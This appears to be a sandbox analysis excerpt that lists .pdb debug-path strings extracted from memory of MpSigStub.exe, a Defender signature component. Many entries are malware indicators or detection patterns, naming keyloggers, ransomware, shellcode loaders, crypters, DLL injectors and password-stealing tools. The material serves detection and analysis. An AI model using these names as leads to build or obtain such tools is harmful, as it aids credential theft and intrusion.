Source:	Binary string: OC:\Users\hoogle168\Desktop\2008Projects\NewCoreCtrl08\Release\NewCoreCtrl08.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: \mywscript.pdb source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp
Source:	Binary string: \CRP\Release\Mount.pdbaD source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp
Source:	Binary string: :Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp
Source:	Binary string: \Release\MyEncrypter2.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: 7h4qMQ1edvEOY+wQIOdVR_v.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: c:\dev\torntv\Release\TornTVApp.pdb source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp
Source:	Binary string: K8MiniPage.pdbx source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp
Source:	Binary string: 0.pdb source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp
Source:	Binary string: \bundler\Production\bundler.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-shlwapi-obsolete-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp
Source:	Binary string: D:\C++\AsusShellCode\Release\AsusShellCode.pdb source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp
Source:	Binary string: R,\\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdbx source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: costura.injectordll.pdb source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp
Source:	Binary string: cleanmgr.pdbPE source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp
Source:	Binary string: [H:\My Data\My Source Code\Microsoft Office 2010\AutoKMS\AutoKMS\obj\x86\Release\AutoKMS.pdb source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp
Source:	Binary string: A .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp
Source:	Binary string: mpengine.pdbOGPS source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: f:\project_2008\Fileman_candle_kgrid\Filebus\Bin\UpdateWindow.pdb source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp
Source:	Binary string: wRHWRH@4hjethwehgw.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: unknowndll.pdba~ source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: \fiDarSayebni.pdb source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp
Source:	Binary string: \[Release.Win32]Clicker.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: %KMS Client\bin\Release\KMS Client.pdba} source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: IperiusRDPClient.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: C:\SuccWare\SuccWare\obj\Debug\SuccWare.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: wajam_goblin.pdb source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp
Source:	Binary string: \\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: MsiDatabaseMerge.pdb source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp
Source:	Binary string: d:\av\common_main.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\twunk_16\objchk\i386\twunk_16.pdb source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp
Source:	Binary string: WebBrowserPassView.pdb source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-registry-l1-1-0.pdb<b`- source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-com-l1-1-0.pdb' source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp
Source:	Binary string: E:\Work\SaveVid\Savevid-WS-Trunk\InstallCore\rbin\soffer.pdb source: MpSigStub.exe, 00000026.00000003.18343744956.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: GCWYq1g.pdb source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp
Source:	Binary string: mfcsubs.pdb source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp
Source:	Binary string: *.pdb.\|!%WINDIR%\Microsoft.NET\mscorsvw.exe source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp
Source:	Binary string: mshta.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: BTR.pdbGCTL source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: D:\developement\projects\flood_load\Release\flood_load.pdb source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp
Source:	Binary string: PROZIPPER.pdb source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp
Source:	Binary string: sfxrar32\Release\sfxrar.pdbxB source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: \\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000026.00000003.18310798250.00000138BDEB0000.00000004.00000001.sdmp
Source:	Binary string: ddraw.pdb source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp
Source:	Binary string: GPDFDocument.pdb source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp
Source:	Binary string: wbadmin.pdb source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp
Source:	Binary string: *\ClientPlugin\obj\Release\ClientPlugin.pdb source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp
Source:	Binary string: Unite.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: z:\Projects\Rescator\uploader\Debug\scheck.pdb] source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp
Source:	Binary string: \MailClient\Release\MailClient.pdb source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp
Source:	Binary string: :FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdbx source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp
Source:	Binary string: L%D:\\MyCode\\riot.?\\decryptor.+\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: Flipopia.pdb source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp
Source:	Binary string: \Ozrenko\Documents\Work\Interstat2\Interstat2\Weather\Interstat.pdb source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp
Source:	Binary string: Downloads\notepad-master\Release\notepad.pdb source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp
Source:	Binary string: AdFind\Release\AdFind.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: Users\Legion\source\repos\curl\Release\curl.pdb source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp
Source:	Binary string: S\\server\\V.\\Release\\PhantomNet.*\.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \PCHunter64.pdb source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: \x64\Release\Narrator.pdb source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdbxc source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp
Source:	Binary string: rasautou.pdb source: MpSigStub.exe, 00000026.00000003.18297877287.00000138BE565000.00000004.00000001.sdmp
Source:	Binary string: \obj\Release\PersistenceModule.pdb source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp
Source:	Binary string: ?E:\hhu\TeamViewer_13.bjbj\BuildTarget\Release2017\tv_w32dll.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: \i386\lanmandrv.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: c:\divide\broad\Hole\DoThird.pdb source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp
Source:	Binary string: XBundlerTlsHelper.pdb source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp
Source:	Binary string: \Release\corsar.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: e:\updatecheck\UpdateCheck\release\UpdateCheck.pdb source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp
Source:	Binary string: UqxIkBeNYhKR.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: e:\src\fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: 9D:\BuildScript.NET\c2patchdx11\pc\Build\Bin32\Crysis2.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: BugTrap.pdb] source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp
Source:	Binary string: obj\Release\FlashPlayerApp.pdb source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp
Source:	Binary string: mpg2splt.pdb source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp
Source:	Binary string: dxtrans.pdb source: MpSigStub.exe, 00000026.00000003.18290876432.00000138BE187000.00000004.00000001.sdmp
Source:	Binary string: c:\supply\trouble\Classwho.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: \Microsoft Windows Search.pdb source: MpSigStub.exe, 00000026.00000003.18307265419.00000138BE9EC000.00000004.00000001.sdmp
Source:	Binary string: termsrv.pdb source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp
Source:	Binary string: fc.pdb0 source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp
Source:	Binary string: AntiMalware_Pro.pdb source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp
Source:	Binary string: Slb.EP.Shell.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: 4\ValhallaCrypter\ValhallaStub\Debug\ValhallaStub.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: EFRE65.pdb source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp
Source:	Binary string: C>s:\\dEVELOPMdNT\\dC\+\+dCdyptordEvoldtiod_dld\\release\\m.pdb source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: lIFdrGkmBePss.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: !#HSTR:PossiblyClean:magottei.pdb.A source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: CryARr.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdb source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp
Source:	Binary string: zYAamTGB2rfW!Cp+aR.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: KSLDriver.pdbGCTL source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: D:\program z visuala\keylogger\Release\keylogger.pdb source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp
Source:	Binary string: \GetWinPsw.pdb source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp
Source:	Binary string: \\WOO\\HT\\HT Server\\.+\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: \bin\winfdmscheme.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: SAVService.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: zC:\Users\EchoHackCmd\source\repos\Minecraft_DLL_Injector\Minecraft_DLL_Injector\obj\x64\Release\Minecraft_DLL_Injector.pdb source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp
Source:	Binary string: 7laIR+\|.XJ5aA0aa.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: wevtutil.pdb source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp
Source:	Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp
Source:	Binary string: \Ransomware2.0.pdb source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp
Source:	Binary string: ToolbarCore\toolbar\ie\src\toolbar\wrapper\Release\externalwrapper.pdbx source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp
Source:	Binary string: C:\\Users\\john\\Documents\\Visual Studio 2008\\Projects\\EncryptFile.\\.\\EncryptFile.exe.pdb source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: \DownloaderMain\DownloaderDll.pdb source: MpSigStub.exe, 00000026.00000003.18333419968.00000138BCD37000.00000004.00000001.sdmp
Source:	Binary string: megasync.pdb source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp
Source:	Binary string: \\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp
Source:	Binary string: msoert2.pdb3 source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp
Source:	Binary string: (vbsedit_source\x64\Release\mywscript.pdb source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: csgoInjector.pdb source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp
Source:	Binary string: \output\MinSizeRel\updrem.pdb] source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: kernel32.pdb source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp
Source:	Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdbx source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp
Source:	Binary string: \\WOO\\HT\\.+Server.+\.pdb source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp
Source:	Binary string: winscard.pdb source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp
Source:	Binary string: stscast.pdb source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
Source:	Binary string: bin\Release\LiveUpdateWPP.pdbxd source: MpSigStub.exe, 00000026.00000003.18343744956.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: ^shell\BATLE_SOURCE\SampleService_run_shellcode_from-memory10-02-2016\Release\SampleService.pdb source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp
Source:	Binary string: \InstallGoogleToolBar\InstallGoogleToolBar\obj\Debug\InstallGoogleToolBar.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: \Release\shellcode.pdb source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: \Current\wear.pdb source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp
Source:	Binary string: PCSUQuickScan.pdb source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp
Source:	Binary string: hWEHW#@HJERKJERJER^$.Pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: e:\caoe.PDBa source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: mpengine.pdb source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: XrfZPp2C.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp
Source:	Binary string: UsoCoreWorker.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: Z:\\Work\\Make Troy\\Concealment Troy\\Exe_Concealment_Troy$Winlogon_Shell$\\.*.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: _sa\bin\Release\ClientSAHook.pdb source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp
Source:	Binary string: c:\To\In\All\With\Within\Value.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp
Source:	Binary string: security.pdb source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb0 source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: \\MoonRat_Develop\\.+\\obj\\Release\\.+\.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \bin\Release.Minimal\officer.pdb source: MpSigStub.exe, 00000026.00000003.18309912138.00000138BE5E8000.00000004.00000001.sdmp
Source:	Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdb source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp
Source:	Binary string: unknowndll.pdbaT source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: LiuLiangBao\Release\LiuLiangBao.pdb source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp
Source:	Binary string: \InstallerMainV6_Yrrehs\Release\Main.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: adptif.pdb3 source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp
Source:	Binary string: :\cef_2883\chromium_git\chromium\src\out\Release_GN_x86\vmxclient.exe.pdb source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: D:\yo\chaos\Release\chaos.pdb source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp
Source:	Binary string: nafde.pdb source: MpSigStub.exe, 00000026.00000003.18343744956.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp
Source:	Binary string: autofmt.pdb source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp
Source:	Binary string: PoolMonPlugin.pdb source: MpSigStub.exe, 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp
Source:	Binary string: TuneUpUtilitiesApp32.pdb source: MpSigStub.exe, 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp
Source:	Binary string: d:\pavbld\amcore\Signature\Source\sigutils\vdlls\Microsoft.NET\VFramework\mscorlib\mscorlib.pdb source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp
Source:	Binary string: \Projects\FlashPlayerPlugin\FlashPlayerPlugin\obj\Release\FlashPlayerPlugin.pdb source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp
Source:	Binary string: AWInstaller.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: HookPasswordReset.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: padcryptUninstaller\obj\Debug\padcryptUninstaller.pdb source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: PassView.pdb source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp
Source:	Binary string: Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp
Source:	Binary string: msoert2.pdb source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp
Source:	Binary string: I \\WOO\\HT\\AD_Attacker\\.+\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdbx source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\finger\objfre\i386\finger.pdb source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp
Source:	Binary string: dfsfgjfgdes.pdb source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp
Source:	Binary string: nanamnana\obj\Debug\nanamnana.pdbx source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp
Source:	Binary string: L6\\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: Qc:\users\mz\documents\visual studio 2013\Projects\Shellcode\Release\Shellcode.pdb] source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: \Release\initialexe\torch.exe.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: \Akl\kh\Release\kh.pdb source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp
Source:	Binary string: dsquery.pdb source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: \ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdb source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp
Source:	Binary string: d:\workspace\ebclient\dmsetup\dmsched2\Release\dmsched2.pdbx source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp
Source:	Binary string: \\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: (d:\p\loser\a\a\objfre_wxp_x86\i386\A.pdb source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp
Source:	Binary string: dxva2.pdb3 source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp
Source:	Binary string: D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: obj\Debug\WinCalendar.pdb source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp
Source:	Binary string: Qc:\users\mz\documents\visual studio 2013\Projects\Shellcode\Release\Shellcode.pdb source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: subst.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: \BaseFlash.pdb source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp
Source:	Binary string: schtasks.pdbd source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
Source:	Binary string: Win32\Release\Sdrsrv.pdb source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp
Source:	Binary string: Cryptor_noVSSnoPers.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: C:\mainProduct(old)\x86_bild_cryptor\shell_gen\Release\data_protect2.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: \Release\SSEngine.pdb source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\lodctr\objchk\i386\lodctr.pdb source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp
Source:	Binary string: \tcrypt\Release\s_low.pdbx source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp
Source:	Binary string: \R980\Release\R980.pdb source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp
